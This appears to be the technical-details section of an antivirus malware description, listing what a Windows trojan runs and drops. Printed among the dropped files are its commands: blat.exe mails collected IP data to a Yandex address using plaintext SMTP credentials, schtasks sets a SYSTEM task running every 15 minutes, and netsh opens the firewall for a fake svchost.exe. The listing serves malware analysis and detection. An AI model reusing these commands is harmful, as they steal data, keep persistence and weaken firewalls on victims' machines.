Техническая информация
- %WINDIR%\blat.exe %WINDIR%/ip.txt -to igo-jbi@yandex.ru.
- %WINDIR%\blat.exe -install -server smtp.yandex.ru -port 587 -f igo-jbi@yandex.ru -u igo-jbi -pw 192gnc5o
- %WINDIR%\run.exe
- <SYSTEM32>\schtasks.exe /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %WINDIR%/ip.bat
- <SYSTEM32>\ipconfig.exe /all
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%WINDIR%\svchost.exe" "Remote %USERNAME% Server" ENABLE
- %WINDIR%\run.exe
- %WINDIR%\blat.dll
- %WINDIR%\blat.lib
- %WINDIR%\ip.txt
- %TEMP%\~1.bat
- %WINDIR%\server.exe
- %TEMP%\$inst\5.tmp
- %TEMP%\$inst\4.tmp
- %TEMP%\$inst\2.tmp
- %WINDIR%\blat.exe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\7.tmp
- %TEMP%\~1.bat
- %TEMP%\$inst\5.tmp
- %TEMP%\$inst\7.tmp
- %TEMP%\~1.bat
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\4.tmp
- '93.##8.134.11':587
- DNS ASK sm##.yandex.ru
- ClassName: 'Shell_TrayWnd' WindowName: ''